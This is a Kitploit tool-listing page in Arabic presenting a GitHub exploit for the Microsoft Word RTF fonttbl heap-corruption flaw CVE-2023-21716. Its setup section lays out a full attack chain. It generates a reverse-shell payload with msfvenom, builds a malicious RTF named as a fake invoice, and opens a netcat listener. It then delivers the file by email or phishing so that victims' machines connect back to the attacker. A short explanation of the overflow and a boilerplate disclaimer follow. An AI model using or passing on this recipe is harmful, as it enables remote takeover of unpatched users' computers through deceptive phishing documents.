Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-21716 — CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload | Kitploit
أدوات/GitHubGitHub/reggyraider/cve-2023-21716
Phishing ToolsPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubreggyraider/cve-2023-21716

CVE-2023-21716

CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-21716 — ثغرة تلف الكومة في معالج RTF في Microsoft Word تؤدي إلى تنفيذ تعليمات برمجية عن بعد

الخطورة: حرجة (CVSS 9.8)
المتأثر: Microsoft Word 2013 / 2016 / 2019 / 2021 (غير مصحح)
التصحيح: تحديث الثلاثاء التصحيحي لشهر فبراير 2023 من Microsoft
المؤلف: REGGYRAIDER


نظرة عامة على الثغرة

CVE-2023-21716 هي ثغرة تلف الكومة في محلل RTF في Microsoft Word (wwlib.dll).
عندما يحلل Word توجيه \fonttbl يحتوي على أكثر من 32,767 إدخال خط، يحدث فيضان عداد موقّع ذي 16 بت، مما يؤدي إلى تلف بيانات الكومة الوصفية. يسمح هذا للمهاجم بتحقيق تنفيذ تعليمات برمجية عن بعد بمجرد إرسال ملف .rtf معدّ للضحية.

لا وحدات ماكرو. لا تفاعل من المستخدم بخلاف فتح الملف.


الإعداد والاستغلال

الخطوة 1 — إنشاء شيلكود خام باستخدام msfvenom

root@kitploit:~
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin

الخطوة 2 — استنساخ هذا المستودع

root@kitploit:~
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716

الخطوة 3 — بناء ملف RTF الخبيث

root@kitploit:~
python3 exploit.py payload.bin invoice_march2024.rtf

الخطوة 4 — تشغيل المستمع الخاص بك

root@kitploit:~
nc -lvnp 4444

الخطوة 5 — تسليم الملف

قم بالرفع عبر SMB أو مرفق البريد الإلكتروني أو أي ناقل تصيد.
عندما يفتح الضحية ملف invoice_march2024.rtf في Word غير مصحح، تتلقى شل عكسية.


كيف يعمل

root@kitploit:~
المهاجم ينشئ RTF              Word يحلل \fonttbl          الكومة تالفة
─────────────────────  ──►   ──────────────────────  ──►  ──────────────
\fonttbl مع 32769+           عداد موقّع ذو 16 بت        شيلكود المهاجم
تعريفات خط                   يفيض ← 0x8000              يعمل
  1. يضمّن الاستغلال 32,769 تعريف خط \f<N> داخل \fonttbl.
  2. يخصص Word مخزنًا بحجم ثابت بناءً على العداد (الذي فاض الآن).
  3. تذهب عمليات كتابة الخط اللاحقة إلى ما بعد المخزن المخصص، مما يؤدي إلى تلف كتل الكومة المجاورة.
  4. يتم وضع الشيلكود الخام (من payload.bin) داخل \pict ويهبط في المنطقة المتضررة، مما يحصل على التنفيذ عندما يعالج المخصص ذلك.

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط.
استخدام هذا الاستغلال ضد أنظمة لا تمتلكها أو ليس لديك إذن كتابي صريح لاختبارها هو غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام.


المراجع

  • إشعار أمان Microsoft
  • إدخال NVD
تنزيل الأداة